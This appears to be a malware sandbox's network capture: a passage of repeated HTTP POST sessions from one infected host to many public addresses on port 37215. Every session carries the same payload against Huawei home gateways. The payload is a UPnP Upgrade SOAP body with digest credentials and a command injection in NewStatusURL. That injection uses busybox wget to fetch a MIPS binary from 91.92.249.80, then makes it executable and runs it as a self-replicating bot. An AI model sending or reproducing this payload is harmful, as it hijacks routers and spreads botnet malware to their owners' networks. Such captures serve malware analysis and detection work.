                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2463192.168.2.234140641.10.192.16237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704890013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2464192.168.2.23428421.188.213.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.704957008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2465192.168.2.2347332157.78.153.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.705688000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2466192.168.2.235187641.153.170.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.705779076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2467192.168.2.235994841.44.90.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.705818892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2468192.168.2.233642641.236.55.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.707252026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2469192.168.2.2340038197.75.151.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.707359076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2470192.168.2.2344982157.194.1.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.707839012 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2471192.168.2.2349880181.82.57.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.707848072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2472192.168.2.234199441.250.159.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.709445953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
